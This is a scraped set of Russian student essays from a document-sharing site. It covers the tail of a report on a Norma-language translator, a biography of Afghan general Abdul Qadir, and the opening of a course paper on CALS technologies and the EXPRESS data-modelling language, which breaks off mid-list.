- разработчиками языка Норма уже написан интерфейс на языке Си,
позволяющий законченные части транслятора, написанные на Рефале, заменять на
законченные части транслятора, написанные на Си, для отладки транслятора.
В процессе трансляции, решаются как традиционные задачи - лексический
синтаксический, семантический анализ, генерация выходной программы, так и
задачи, определяемые спецификой языка Норма: организация вычислений по
непроцедурному описанию задачи с выявлением возможного параллелизма
вычислений, семантический контроль возможности организации вычислений с учетом
возможностей выходного языка и архитектуры компьютера. Выходными языкоми могут
быть языки Фортран ВП ориентированный на многопроцессорный вариант ЭВМ ЕС-1191
и Фортран JNS. Трансляция проводится каждого раздела, входящего в Норма
программу, проводится автономно: для каждого раздела либо выдается программа
на выходном языке, либо, если были обнаружены синтаксические или семантические
ошибки, выдается сообщение об ошибке, после чего осуществляется переход к
трансляции очередного раздела.
Транслятор с языка программирования имеет следующую структуру:
Вход:
_______________ __________________________ ________________________
|исходный текст | | Лексический анализ | | Синтаксический анализ |
|программы + | --> |(Выделение лексем, | |и частично семантический|
|опции командной| | гупприровка лексем, | -->| анализ описаний и |-->
|строки | | начальное заполнение | | операторов |
---------------- | таблиц имен и констант)| | (заполнение всех аблиц)|
------------------------- -------------------------
________ ________________ _________
| Табл. |--- | | | Табл. |--
| | | | МЕНЕЖЕР ПАМЯТИ | | множеств| |
| | | |________________| | и т.п. | |
| | | | | |
| | | | | |
|_______| | |_________| |
---------| |_________|
Выход:
__________________ ______________ ___________ ___________
|Построение графа | |Органинизация | | Генерация | |Текст |
-->|информационных | --> |параллельных | --> | Фортран- | ->|программы |
|зависимостей опе- | |вычислений | | программы | |на Фортране|
|раторов программы | -------------- ----------- -----------
------------------
На вход лексического анализатора поступает текст исходной программы.На выходе
- отсортированный (по описаниям, операторам и итерациям) список лексем,
начально заполненные таблици имен и констант. Далее этот список поступает на
вход синтаксического анализатора, где происходит разбор конструкций-описаний,
операторов, итераций и заполняются таблицы имен, констант, множеств, описания
операторов и др. Перед началом этапа синтаксического анализа, длямаксимальной
очистки памяти происходит конвертация начальных таблиц имен и констант. Эти
таблицы поступают на вход следующего этапа, где происходит построение графа
информационных зависимостей, который используется на следуещем этапе при
определение порядка вычислений и разделение на параллельные ветви, независящие
друг от друга. На выходе получаем внутренние коды. Внутренние коды поступают
на вход кодогенерации. Выходом кодогенерации является программа на языке
Фортран.
Для обеспечения доступа к верхней памяти,а также для возможного свопинга
все операции с оперативной памятью осуществляются с использованием библиотеки
функций менеджера памяти, написанной сотрудниками института прикладной
математики.
4 Описание и решение задачи.
4.1 Постановка задачи.
В свете вышесказанного перед нами (группой разработчиков) встала задача
напсания транслятора с языка Норма с использованием инструментальных средств
языка программирования Си и библиотеки функций работы с операивной памятью.
Передо нами (двумя разработчиками) была поставлена задача написания функций
работы с таблицами имен и констант.
4.2 Решение задачи.
Для начального заполнения таблиц имен и констант были выбраны хэш-таблици.
При этом мы проигрывали в использовании оперативной памяти, но выигрывали во
времени (по сравнению с "деревьями"). Учитывая повышенные требования к
использованию памяти нами было рпинято решение по окончанию этапа лексического
анализа (т.е. после того как завершится предварительное заполнение таблиц имен
и констант и нам будет вточности известно количество идентификаторов и констант
используемых в транслируемой программе) провести конвертацию поисковой части
хэш-таблиц в непрерывные массивы фиксированной длины. При этом мы увеличиваем
обшее время трансляции за счет времени конвертации, но выигрываем в использовании
оперативной памяти за счет уменьшения числа информационных полей (в хэш-таблице
сушествует поле содержащее код идентификатора(константы), который является
ключом этого идентификатора(константы) в дальнейшей работе транслятора, в
масиве роль ключа будет играть смешение зтого элемента от начала массива -
индекс масива), а так же за счет освобождения неисопльзуемых учасков в
хэш-таблице (в любой хэш-таблице из за случайности процесса хэширования
появляются неиспользованные области приблизительно 30% от величины всей таблици).
Плюсом также является умьшение времени поиска по ключу. В масиве эта операция
эквавалентна взятию индекса от масива. В хэш-таблице поик гораздо дольше.
4.3 Выбор структуры данных
3. ЗАКЛЮЧЕНИЕ
В результате проделанной работы мною были достигнуты следуюющие цели:
- ознакомилась и изучила непроцедурный язык программирования Норма, предназначенный для записи численных методов решения задач математической физики разностными методами;
- изучила структуру транслятора с языка программирования Норма;
- ознакомилась с методами лексического анализа;
- изучила структуру лексического анализатора;
- разработала структуру данных своей части задания для реализации лексического анализатора;
-написала функцию, на вход которой поступает список лексем, а на выходе получаем список списков. Элементом этого списка списков является список лексем, который представляет собой одно предложение программы, написанной на Норме, оканчивающееся точкой. Т.е. эта функция "режет" поступающий на вход список лексем по точкам, а на выходе получаем список предложений, каждое из которых заканчивается точкой и представляется списком лексем.
Программа находится на стадии разработки. Завершение работы планируется в следующем семестре. Задание на УИР и КП выполнила полностью.
Список литературы:
А.Н. Андрианов, К.Н. Ефимкин, И.Б. Задыхайло, Н.В. Поддерюгина "Язык Норма"
А.Н. Андрианов, К.Н. Ефимкин, И.Б. Задыхайло "Непроцедурный язык Норма и методы его реализации"
А.Б. Бугеря "Реализация математических функций языка Норма для распределенных высислительных систем"
Приложение 1. |
https://doc4web.ru/istoriya/abdulkadir.html | Абду-л-Кадыр | https://doc4web.ru/uploads/files/168/6f9613b8497c19fe02dca6fb665d3bae.docx | files/6f9613b8497c19fe02dca6fb665d3bae.docx | План
Введение
1 Биография
1.1 Семья
1.2 Образование
1.3 Служба в армии
1.4 Политическая деятельность
1.4.1 Саурская революция
1.4.2 Деятельность во время правления НДПА
1.4.3 Дипломат-эмигрант
Список литературы
Абду-л-Кадыр
Введение
Абдул Кадир Дагарваль (родился 1934 (по другим данным — 1944), в провинции Гор (по другим данным — Герат)) — государственный и военный деятель Афганистана, генерал-полковник (1983), по национальности — чараймак племени зури (одно из национальных меньшинств Афганистана).
1. Биография
СемьяРодился в семье Мохаммада Акрама. Образование
Получил образование в военном лицее и военной академии в Кабуле, а также в Киевском высшем военно-авиационном училище.
1.3. Служба в армии
Служил офицером в афганских Военно-воздушных силах. С молодых лет придерживался левых политических взглядов. В начале 1960-х годов, вместе с некоторыми другими офицерами ВВС, был участником нелегальной «группы Максуди». В 1973 являлся одним из руководителей государственного переворота, в результате которого была свергнута монархия, а главой государства стал генерал Мохаммад Дауд. После переворота был назначен начальником штаба ВВС и ПВО, однако уже в 1974 смещён с этой должности из-за разногласий с Даудом и назначен начальником кабульской военной скотобойни.
1.4. Политическая деятельность
В 1974 создал и возглавил подпольную организацию «Объединённый фронт коммунистов Афганистана» (ОФКА), в состав которой входили военнослужащие ВВС. Образцом для Абдул Кадира послужила организация «Свободные офицеры» Гамаля Абдель Насера в Египте 1950-х годов. Готовил военный переворот с целью свержения власти Дауда. Строгая конспирация привела к тому, что Дауд, не считая Абдул Кадира опасным соперником, вернул его в 1977 на пост начальника штаба ВВС и ПВО.
Саурская революция
В апреле 1978 стал одним из лидеров переворота (позднее названного Саурской — Апрельской — революцией), в результате которого был свергнут режим Дауда — в условиях, когда основные лидеры Народно-демократической партии Афганистана (НДПА) были превентивно арестованы. 27 апреля 1978 лично привлёк на свою сторону военных летчиков авиабазы Баграм и, по некоторым данным, сам пилотировал самолет, который нанёс решающий ракетно-бомбовый удар по резиденции Дауда. 27 — 29 апреля 1978 был фактическим руководителем Революционного совета Вооружённых сил, от имени которого огласил по афганскому радио сообщение о свержении режима. Передал власть в руки Революционного совета Афганистана, контролировавшегося НДПА. Вошёл в состав этого органа власти.
Деятельность во время правления НДПА
1 мая 1978 был назначен министром национальной обороны и произведён в генерал-майоры. Однако не был включён в состав ЦК НДПА, а в члены партии были приняты лишь 15 (из несколько сотен) членов самораспустившейся ОФКА. Быстро вступил в конфликт с лидерами фракции «Хальк» в НДПА, особенно, с Хафизуллой Амином; сблизился с другой фракцией — «Парчам». Участвовал в разработке планов организации нового переворота, который должен был отстранить от власти «халькистов».
19 августа 1978 был арестован по обвинению в подготовке заговора. Приговорён к смертной казни, которая, по настоянию посольства СССР, была заменена 15 годами лишения свободы. 27 декабря 1979, после ввода советских войск в Афганистан, был освобождён. В январе 1980 назначен заведующим отделом обороны и юстиции ЦК НДПА, включён в состав президиума Революционного совета. В апреле 1980 произведён в генерал-лейтенанты.
4 января 1982 был назначен исполняющим обязанности министра обороны — после того, как министр, представитель фракции «Парчам» Мохаммад Рафи был направлен на учёбу в Москву. 23 сентября 1982 утверждён министром обороны. Пользовался поддержкой со стороны руководства министерства обороны СССР, которое считало его более энергичным военачальником, чем Рафи. Для укрепления позиций Абдул Кадира в партии он был избран кандидатом в члены политбюро ЦК НДПА (12 декабря 1982), а 14 апреля 1983 произведён в генерал-полковники. В то же время представители КГБ СССР, делавшие ставку на фракцию «Парчам», испытывали к нему недоверие. Начальник советской разведки Леонид Шебаршин позднее вспоминал:
Вскоре выяснится, что личный шофёр Кадира сотрудничает с Ахмад Шахом Масудом, а много позже придётся задуматься о роли и самого министра. Будучи уже в отставке, строго-строго по секрету он признался своему другу, что всегда был последователем главы Исламского общества Афганистана Бурхануддина Раббани.
— Л. В. Шебаршин «Рука Москвы: записки начальника советской разведки»[1]
Позиции Абдул Кадира ослабляло то, что он не принадлежал ни к одной из фракций НДПА (и, следовательно, был для обеих «чужим»), а также, будучи чараймаком, не мог опереться на поддержку одной из двух крупнейших национальных групп Афганистана — пуштунов или таджиков. К 1984 военное руководство СССР, разочарованное отсутствием прогресса в борьбе с моджахедами, приняло решение выдвинуть на пост министра обороны представителя фракции «Хальк». Абдул-Кадир 4 декабря 1984 был переведён на должность первого заместителя председателя Революционного совета Афганистана, а уже 21 ноября 1985 снят с руководящих постов.
Специалист по истории и политике Афганистана М. Ф. Слинкин дал такую характеристику Абдул-Кадиру:
Представляется, что А. Кадир был искренен в симпатиях к Советскому Союзу. Все, кто знал его близко по работе, отмечали его высокий профессионализм, добропорядочность, обострённое чувство патриотизма, долга и офицерской чести и вместе с тем вспыльчивость, излишнюю прямолинейность и жёсткость в отношениях с подчинёнными и начальниками.
— М. Ф. Слинкин «Народно-демократическая партия Афганистана у власти. Время Тараки-Амина (1978—1979 гг.)»[2]
Дипломат-эмигрант
В сентябре 1986 назначен послом Афганистана в Польше, но уже вскоре ушёл в отставку из-за разногласий с политикой нового президента Наджибуллы. Жил в Болгарии. Существует информация, что в 1990-е годы он был неформальным военным советником Генштаба у Ахмад Шаха Масуда.
Переехал в Россию. В 2004 тогдашний посол Афганистана в России Ахмад Зия Масуд заявил, что
в России сейчас живёт около 40-50 тысяч афганцев, примерно половина из них — в Москве. У нас самые тёплые и дружественные отношения с ними. Несмотря на то, что многие из них в прошлом находились на руководящих постах режима НДПА. Например, бывший министр внутренних дел господин Гулябзой или экс-министр обороны господин Кадир — у нас с ними очень хорошие отношения. Все они могут совершенно свободно поехать в Афганистан.
— Интервью Ахмада Зия Масуда «Московскому комсомольцу»[3]
Список литературы:
Л. В. Шебаршин Афганистан // Рука Москвы: записки начальника советской разведки. — М.: Центр-100, 1992. — 352 с. — 50000 экз. — ISBN 5-86082-011-9
М. Ф. Слинкин Приложение 1. Персоналия // Народно-демократическая партия Афганистана у власти. Время Тараки-Амина (1978—1979 гг.). — Симферополь: Симферопольский государственный университет, 1999. — С. 228. — ISBN 966-7404-16-1
Андрей Яшлавский Брат Льва // Московский комсомолец. — № 897.
Источник: http://ru.wikipedia.org/wiki/Абду-л-Кадыр |
https://doc4web.ru/informatika/yazik-opisaniya-informacionnih-modeley-epress.html | Язык описания информационных моделей EXPRESS | https://doc4web.ru/uploads/files/194/66831587193382270dbe6213e9a38a43.docx | files/66831587193382270dbe6213e9a38a43.docx | Федеральное агентство по образованию
Сибирская государственная автомобильно-дорожная академия
(СибАДИ)
Кафедра УК и С
КУРСОВАЯ РАБОТА
на тему: Язык описания информационных моделей (EXPRESS)
по дисциплине «CALS-технологии»
Выполнила: ст-ка гр.41С
Проверил:
Омск – 2009
Содержание
Введение
1 Преимущества CALS
2 CALS в России
3 Государство покровительствует CALS-технологиям
4 Проблемы стандартизации описания продукции, технологии и бизнеса
5 Объектно-ориентированное моделирование на EXPRESS
6 Общая систематизация подходов
6.1 Классификация паттернов отображения
6.2 Отображение информационных схем
6.2.1 Схемо-независимая стратегия
6.2.2 Схемо-зависимая стратегия
6.3 Отображение наследования классов
6.3.1 Паттерн OneInheritanceHierarchy–OneTable
6.3.2 Паттерн OneClass–OneTable
6.3.3 Паттерн OneInheritancePath–OneTable
6.3.4 Паттерн AllClasses–OneTable
6.3.5 Паттерн BLOB
6.4 Отображение атрибутов
6.4.1 Представление простых типов
6.4.2 Отображение атрибутов простых типов
6.4.2.1 Паттерн Attribute–Column
6.4.2.2 Паттерн Attribute–Table
6.4.3 Отображение ассоциаций
6.4.3.1 Паттерн ForeignKeyAssociation
6.4.3.2 Паттерн ClassAssociation
6.4.3.3 Паттерн GenericAssociation
6.4.4 Отображение селективных типов
6.4.4.1 Паттерн Select–Columns
6.4.4.2 Паттерн ClassSelect
6.4.4.3 Паттерн HierarchySelect
6.4.4.4 Паттерн GenericSelect
6.4.5 Отображение агрегатов
6.4.5.1 Паттерн ClassAggregate
6.4.5.2 Паттерн HierarchyAggregate
6.4.5.3 Паттерн GenericAggregate
6.5 Отображение метаданных
7 Реализация промежуточного объектно-реляционного слоя в среде Oracle9
7.1 Схемо-независимая стратегия
7.2 Схемо-зависимая стратегия
7.3 BLOB стратегия
8 Рекомендации использования
Заключение
Список используемых источников
Введение
Термин CALS (Continuous Acquisition and Lifecycle Support — непрерывная информационная поддержка поставок и жизненного цикла) означает совокупность принципов и технологий информационной поддержки жизненного цикла продукции на всех его стадиях. Русскоязычный аналог понятия CALS — Информационная Поддержка жизненного цикла Изделий (ИПИ). В последнее время за рубежом наряду с CALS используется также термин Product Lifecycle Management (PLM).
Цель внедрения CALS — минимизация затрат в ходе жизненного цикла изделия, повышение его качества и конкурентоспособности.
Для описания схем данных используется разработанный язык EXPRESS. Этот язык регламентирует:
Черчение (прямое и ассоциативное)
Проектирование конструкций
Инженерный анализ
Технологическую подготовку
Производство
Тестирование данных и обмен ими в специальном текстовом формате
1. Преимущества CALS
Технологии, стандарты и программно-технические средства CALS обеспечивают эффективный и экономичный обмен электронными данными и безбумажными электронными документами, что дает следующие преимущества:
· возможность параллельного выполнения сложных проектов несколькими рабочими группами (параллельный инжиниринг), что существенно сокращает время разработок;
· планирование и управление многими предприятиями, участвующими в жизненном цикле продукции, расширение и совершенствование кооперационных связей (электронный бизнес);
· резкое сокращение количества ошибок и переделок, что приводит к сокращению сроков реализации проектов и существенному повышению качества продукции;
· распространение средств и технологий информационной поддержки на послепродажные стадии жизненного цикла - интегрированная логистическая поддержка изделий.
На экономические показатели предприятий, применяющих CALS-технологии, непосредственно влияют следующие факторы:
· сокращение затрат и трудоемкости процессов технической подготовки и освоения производства новых изделий;
· сокращение сроков вывода на рынок новых конкурентоспособных изделий;
· сокращение брака и затрат, связанных с внесением изменений в конструкцию;
· увеличение объемов продаж изделий, снабженных электронной технической документацией (в частности, эксплуатационной), составленной в соответствии с требованиями международных стандартов;
· сокращение затрат на эксплуатацию, обслуживание и ремонт изделий ("затрат на владение"), которые для сложной наукоемкой продукции подчас равны или превышают затраты на ее закупку.
Вот некоторые количественные оценки эффективности внедрения CALS в промышленности США:
· прямое сокращение затрат на проектирование - от 10 до 30%;
· сокращение времени разработки изделий - от 40 до 60%;
· сокращение времени вывода новых изделий на рынок - от 25 до 75%;
· сокращение доли брака и объема конструктивных изменений - от 20 до 70%.
· сокращение затрат на подготовку технической документации - до 40%;
· сокращение затрат на разработку эксплуатационной документации - до 30%.
По зарубежным данным, потери, связанные с несовершенством информационного взаимодействия с поставщиками, только в автомобильной промышленности США составляет порядка 1 млрд. долл. в год. Аналогичные потери имеют место и в других отраслях промышленности.
В тех же источниках указывается, что затраты на разработку реактивного двигателя GE 90 для самолета «Боинг-777» составили 2 млрд. долл., а разработка новой модели автомобиля компании «Форд» стоит от 3 до 6 млрд. долл. Это означает, что экономия от снижения прямых затрат на проектирование только по двум указанным объектам может составить от 500 млн. до 2,2 млрд. долл.
Как видим, внедрение CALS-технологий приводит к существенной экономии и получению дополнительной прибыли. Поэтому эти технологии и их отдельные компоненты широко применяются в промышленности развитых стран. Так, из числа 500 крупнейших мировых компаний, входящих в перечень Fortune 500, около 100% используют такой важнейший компонент CALS, как средства PDM (Product Data Management — «управление данными об изделии»). Среди предприятий с годовым оборотом свыше 50 млн. долл. такие системы используют более 80%.
В связи с большими объемами ожидаемой экономии и дополнительных прибылей в эту сферу привлекаются значительные инвестиции, измеряемые миллиардами долларов. По данным зарубежных источников, инвестиции правительства США в сферу CALS-технологий составляют около 1 млрд. долл. в год. Затраты других стран меньше, однако, например, правительство Финляндии затратило на национальную программу в этой области свыше 20 млн. долл. и примерно такую же сумму (около 25 млн. долл.) вложили в нее частные компании. Корпорация General Motors в течение 1990 — 1995 годов израсходовала на эти цели 3 млрд. долл. Средние затраты на один проект, посвященный решению локальной задачи в области CALS-технологий (например, разработка стандарта или программы), составляют 1,2 — 1,5 млн. долл. при среднем сроке выполнения от двух до четырех лет.
Эти цифры свидетельствуют о том, какое значение придают на Западе проблематике, связанной с CALS-технологиями.
2. CALS в России
Россия существенно отстает от ведущих промышленно развитых стран в части внедрения современных ИТ, в том числе технологий CALS. Это отставание чревато далеко идущими негативными последствиями, прежде всего, высокой вероятностью резкого сокращения экспортного потенциала российских производителей наукоемкой продукции, вплоть до полного вытеснения их с международного рынка, что может, по мнению зарубежных экспертов, произойти к 2005 — 2008 году.
Мировой рынок полностью отторгнет продукцию, не снабженную электронной документацией и не обладающую средствами интегрированной логистической поддержки постпроизводственных стадий жизненного цикла. Уже сегодня многие иностранные заказчики отечественной продукции выдвигают требования, удовлетворение которых невозможно без внедрения CALS-технологий:
· представление конструкторской и технологической документации в электронной форме;
· представление эксплуатационной и ремонтной документации в форме интерактивных электронных технических руководств, снабженных иллюстрированными электронными каталогами запасных частей и вспомогательных материалов и средствами дистанционного заказа запчастей и материалов;
· организация интегрированной логистической поддержки изделий на постпроизводственных стадиях их жизненного цикла;
· наличие и функционирование электронной системы каталогизации продукции;
· наличие на предприятиях соответствующих требованиям стандартов ИСО 9000:2000 систем менеджмента качества и т. д.
Выполнение этих требований предопределяет необходимость внедрения на отечественных предприятиях CALS-технологий в полном объеме.
3. Государство покровительствует CALS-технологиям
В период с 1999-го по 2002 год Минпромнауки РФ совместно с Госстандартом РФ и Минобразования РФ осуществили ряд мер, направленных на создание предпосылок к внедрению CALS-технологий в промышленности России.
Были созданы начальные элементы инфраструктуры, необходимой для разработки и внедрения CALS-технологий: Государственный научно-образовательный центр CALS-технологий, Научно-исследовательский центр (НИЦ) CALS-технологий «Прикладная логистика» и технический комитет ТК 431 Госстандарта России, координирующий разработку отечественной нормативной базы.
Подготовлены научно-методические разработки: концепция развития CALS-технологий в промышленности России [1], концепция интегрированной логистической поддержки наукоемких изделий и концепция внедрения CALS-технологий на машиностроительном предприятии.
Предприняты разработки в области создания нормативной базы: Госстандарт РФ утвердил шесть документов ГОСТ Р ИСО 10303 и шесть документов в статусе рекомендаций по стандартизации Р 50. Были подготовлены проекты 7 ГОСТ Р и три проекта авиационных отраслевых стандартов. Кроме того, разработана программа работ по подготовке новых стандартов и корректировке существующих (ЕСКД, СРПП и др.).
Созданы программные средства, реализующие CALS-технологии. В их числе — программный продукт Technical Guide Builder, предназначенный для автоматизированной подготовки электронной технической эксплуатационной документации на экспортируемую продукцию, соответствующей требованиям CALS-стандартов. Создание с помощью этого продукта интерактивных электронных технических руководств значительно повышает конкурентоспособность продукции. Другой продукт — PDM STEP Suite — служит для управления данными об изделии в процессе конструирования и технологической подготовки производства, что крайне необходимо предприятиям, как разрабатывающим наукоемкую продукцию, так и продающим лицензии на ее производство.
Наконец, разработаны методические основы создания интегрированной системы управления качеством продукции, соответствующей требованиям стандартов ИСО серии 9000 версии 2000 года.
Работы по внедрению CALS-технологий в промышленность России интенсивно продолжаются при пристальном внимании и поддержке Минпромнауки РФ, Госстандарта РФ и других министерств и ведомств России. Авторы надеются, что эти работы позволят если не полностью преодолеть, то хотя бы существенно сократить отставание российской промышленности от промышленности ведущих стран Запада.
4. Проблемы стандартизации описания продукции, технологии и
бизнеса
Началом современного этапа стандартизации описания продукции и технологии можно считать появление в середине 80-х годов проекта STEP (STandard for the Exchange of Product model data ) – серии стандартов для обеспечения универсального механизма обмена данными о продукции и технологии как между различными организациями, так и между разными этапами жизненного цикла продукции. Ядром STEP был почти объектно-ориентированный язык информационного моделирования EXPRESS (ISO 10303, part11). Не являясь языком программирования, не поддерживая “методы” и механизмы их наследования, действующая версия EXPRESS обеспечивает объектно-ориентированную идеологию для описания концептуальных моделей данных (множественное наследование данных и ограничений, выводимые атрибуты и др.).
Вторым "китом", на котором основан EXPRESS, является модель “сущность-связь” (E-R модель). Так же, чувствуется влияние и SQL. Графическая версия – EXPRESS-G уже полностью вытеснила IDEF 1X, который использовался на начальных этапах проекта STEP. В новой версии – EXPRESS v2 уже предполагается полная объектно-ориентированность, с поддержкой моделирования процессов, событий, транзакций, а также единая формальная метамодель, гораздо более детализированная и семантически более строгая, чем части Generic Resources серии стандартов ISO 10303 (parts 41-49).
Вся работа над проектом велась под эгидой подкомитета 4, технического комитета 184 ISO (ISO TC184/SC4), к концу 90-х годов в рамках которого появилось еще несколько серий стандартов (разной степени завершенности), связанных с описанием уже не только продукции и технологии (ISO 13584, ISO 14959, ISO 15926), но и управления производством (Manufacturing Management – MANDATE - ISO 15531) и использующих в качестве основы язык EXPRESS.
За 15 лет вокруг EXPRESS и STEP сформировалась уже целая отрасль ИТ, которая обеспечивает значительное уменьшение трудозатрат при “запуске” новых технологий и новых видов продукции. Причем, если серия ISO 10303 начиналась прежде всего для обслуживания автомобильной и аэрокосмической промышленностей, то сейчас она охватывает уже большинство видов производств, включая электротехническое, кораблестроительное, строительство, нефтехимическое и т.п. Появились не только компании, специализирующиеся на инструментарии технологии STEP, но и организации общеметодологического плана, связанные с развитием технологии “данных о продукции” (Product Data Technology- PDT), например EuroSTEP, PDT Solutions, PDTAG , PDES и др.
Важно отметить активное использование Internet при разработке стандартов, в работе над которыми принимают участие многие организации и специалисты всех ведущих стран мира. Это и серии телеконференций с дискуссиями по наиболее важным вопросам, и электронное голосование по утверждению проектов стандартов на разных стадиях разработки вплоть до статуса Международного стандарта, и организация очных семинаров/конференций, и организация полного электронного архива, доступного по Сети. Такая технология организации проектов на основе управления знаниями симптоматична для “новой эры” однако она делает только первые шаги и серьезно противоречит существующим социальным институтам.
Несмотря на внешние успехи сама идеология, методология и технология STEP/EXPRESS требует глубокого совершенствования. С одной стороны, нужна “гармонизация” и “модуляризация” стандартов внутри самого ISOTC184/SC4, c другой, оказалось необходимым выйти за рамки описания “продукции и технологии” и включить более широкий круг вопросов бизнеса, с третьей стороны все более возникает необходимость в согласовании аналогичных работ с другими организациями, занимающимися разработками в том же направлении и прежде всего с группами CSMF (Conceрtual Schema Modelling Facilities) и CDIF (CASE Data Interchange Format) в рамках объединенного технического комитета ISO и Международной Электротехнической Комиссии (ISO/IEC JTC1), с консорциумом WWW (W3C), с базовыми подгруппами OMG (Object Management Group), с группой KIF ( Knowledge Interchange Format ) ANSI ASC X3T2 , а также с OAG (Open Application Group).
5. Объектно-ориентированное моделирование на EXPRESS
Кратко рассмотрим подмножество языка EXPRESS, непосредственно относящееся к спецификации объектно-ориентированных данных. EXPRESS включает в себя также довольно развитую императивную часть, предназначенную для определения поведенческих свойств объектов и задания ограничений на них. Однако в силу предмета статьи эти подробности будут опущены, а их описание может быть найдено в оригинале стандарта языка
Язык EXPRESS поддерживает набор стандартных, встроенных в него элементарных типов данных INTEGER, REAL, NUMBER, LOGICAL, BOOLEAN, BINARY и STRING для представления, соответственно, целых, вещественных и произвольных числовых данных, логических и булевых значений, последовательностей двоичных данных и строк. Для перечислимых типов предусмотрена специальная конструкция ENUMERATION. Агрегатные типы ARRAY, SET, BAG и LIST предоставляют возможность определения различного рода контейнеров, таких как массивы, множества, мультимножества и списки. Опционально могут быть заданы их размеры, способы индексации элементов, условие множественности эквивалентных элементов для массивов и списков, а также допустимость разреженности элементов в массивах. Селективные типы, вводимые оператором SELECT, позволяют использовать переменные и константы, принимающие значения одного из альтернативных типов, объявленных в списке оператора. Новые производные типы данных создаются на основе стандартных и предопределенных типов с помощью конструкции TYPE. Допускается произвольная вложенность определений пользовательских типов, которая, в частности, обеспечивает создание многомерных массивов, вложенных селективных и агрегатных конструкций.
Типы GENERIC, AGGREGATE, а также ARRAY, SET, BAG и LIST OF GENERIC обеспечивают обобщенную реализацию функций и процедур с использованием абстракций простых и агрегатных данных.
Для объектных типов используется конструкция ENTITY, предусматривающая разнообразные модели простого и множественного наследования с помощью квалификаторов AND, ANDOR, ONEOF. При специфицировании объектного типа задаются атрибуты и ассоциации различной кратности (EXPLICIT), обратные ассоциации (INVERSE), а также производные вычисляемые свойства объектов (DERIVED). Последние определяются типами и выражениями, которые могут включать в себя значения явных атрибутов, константы, исполняемые операторы, включая вызов функций и процедур, как стандартных, так и пользовательских.
Ограничения целостности данных задаются непосредственно при определении объектного типа с помощью конструкции WHERE, определяющей логические условия в виде выражений логического типа, а также с помощью квалификатора UNIQUE, приписывающего условие уникальности атрибутам, ассоциациям и производным свойствам в популяциях родственных объектов. Для задания глобальных ограничений над разнородными объектами предусмотрена конструкция RULE, позволяющая описать ограничение в виде формальной спецификации функции логического типа.
Определения глобальных констант, простых и объектных типов данных, глобальных ограничений объединяются в разделе информационной схемы модели (SCHEMA). Посредством конструкций импорта USE и REFERENCE достигается возможность использования в одной схеме определений из других схем, что обеспечивает разработку сложных информационных моделей путем иерархической композиции отдельных схем. Таким образом, охватываются разнообразные практически содержательные случаи объектно-ориентированного моделирования прикладных данных.
Ниже представлен пример информационной модели на языке EXPRESS — схема ActorResource, специфицирующая информацию о персонах и организациях, участвующих в совместном проекте, их ролях в нем и отношениях между ними.
SCHEMA ActorResource;
TYPE ActorSelect = SELECT (Organization, Person);
END_TYPE;
TYPE AddressTypeEnum = ENUMERATION OF (
END_TYPE;
TYPE Label = STRING(255);
END_TYPE;
TYPE ActorRole = Label;
END_TYPE;
ENTITY Address
ABSTRACT SUPERTYPE OF (ONEOF(PostalAddress, TelecomAddress));
Purpose : AddressTypeEnum;
UserDefinedPurpose : OPTIONAL STRING;
INVERSE
OfPerson : SET OF Person FOR Addresses;
OfOrganization : SET OF Organization FOR Addresses;
WHERE
WR1 : (Purpose <> AddressTypeEnum.USERDEFINED) OR
((Purpose = AddressTypeEnum.USERDEFINED) AND
EXISTS(UserDefinedPurpose));
END_ENTITY;
ENTITY PostalAddress
SUBTYPE OF(Address);
AddressLines : LIST [1:?] OF Label;
END_ENTITY;
ENTITY TelecomAddress
SUBTYPE OF(Address);
TelephoneNumbers : OPTIONAL LIST [1:?] OF Label;
FacsimileNumbers : OPTIONAL LIST [1:?] OF Label;
ElectronicMailAddresses : OPTIONAL LIST [1:?] OF Label;
WWWUrls : OPTIONAL LIST [1:?] OF Label;
WHERE
WR1 : EXISTS (TelephoneNumbers) OR EXISTS (FacsimileNumbers) OR
EXISTS (ElectronicMailAddresses) OR EXISTS (WWWUrls);
END_ENTITY;
ENTITY Organization;
Id : INTEGER;
Name : Label;
Description : OPTIONAL STRING;
Roles : LIST [0:?] OF UNIQUE ActorRole;
Addresses : LIST [1:?] OF UNIQUE Address;
INVERSE
IsRelatedBy : SET OF OrganizationRelationship FOR RelatedOrganizations;
Relates : SET OF OrganizationRelationship FOR RelatingOrganization;
Engages : SET OF Person FOR EngagedIn;
UNIQUE
UR1 : Id;
END_ENTITY;
ENTITY OrganizationRelationship;
Name : Label;
Description : OPTIONAL STRING;
RelatingOrganization : Organization;
RelatedOrganizations : SET [1:?] OF Organization;
END_ENTITY;
ENTITY Person;
Id : INTEGER;
FamilyName : OPTIONAL Label;
GivenName : OPTIONAL Label;
MiddleNames : OPTIONAL LIST [1:?] OF Label;
PrefixTitles : OPTIONAL LIST [1:?] OF Label;
SuffixTitles : OPTIONAL LIST [1:?] OF Label;
Roles : LIST [0:?] OF UNIQUE ActorRole;
Addresses : OPTIONAL LIST [1:?] OF UNIQUE Address;
EngagedIn : SET OF Organization;
UNIQUE
UR1 : Id;
WHERE
WR1 : EXISTS(FamilyName) OR EXISTS(GivenName);
END_ENTITY;
END_SCHEMA;
К настоящему времени в рамках международных программ по стандартизации прикладных информационных моделей и интероперабельности программных приложений накоплен значительный ресурс многопрофильных междисциплинарных моделей. Ресурс охватывает такие научные и промышленные области, как машиностроение, авиационную и космическую промышленность, судостроение, нефтегазовый комплекс, архитектуру и строительство, электронную промышленность, фармацевтику, геоинформатику. Значительная часть разработанных на языке EXPRESS спецификаций принята в качестве документов ISO-10303. Другая часть разрабатывается непосредственно промышленными альянсами для последующего представления в международную организацию по стандартам.
К существенным особенностям прикладных информационных моделей следует отнести:
сложность и масштабность моделей, выражающиеся в большом количестве типов, определяемых в рамках одной информационной схемы, в применении альтернативных механизмов множественного наследования и полиморфного переопределения свойств объектных типов, а также в использовании вложенных агрегатных и селективных конструкций и двунаправленных ассоциаций;
необходимость поддержки запросов к данным в декларативном предикативном и навигационном стилях, а также эффективную реализацию базовых операций манипулирования ими;
широкий контекст использования моделей в приложениях, оперирующих как с данными одной многопрофильной информационной схемы, так и с данными нескольких независимых схем.
Данные особенности обуславливают поиск эффективных решений для объектно-реляционного отображения и их систематизацию для комплексного использования в конкретных прикладных контекстах.
6. Общая систематизация подходов
6.1 Классификация паттернов отображения
Независимо от особенностей применяемых подходов нам видится ряд связанных между собой аспектов отображения прикладных данных из объектно-ориентированной модели в реляционную. Прежде всего, это технические вопросы семантического отображения в реляционную метамодель базовых конструкций языка EXPRESS, а именно:
элементарных базовых типов;
перечислимых типов;
ассоциативных связей между объектами;
селективных типов;
агрегатных типов;
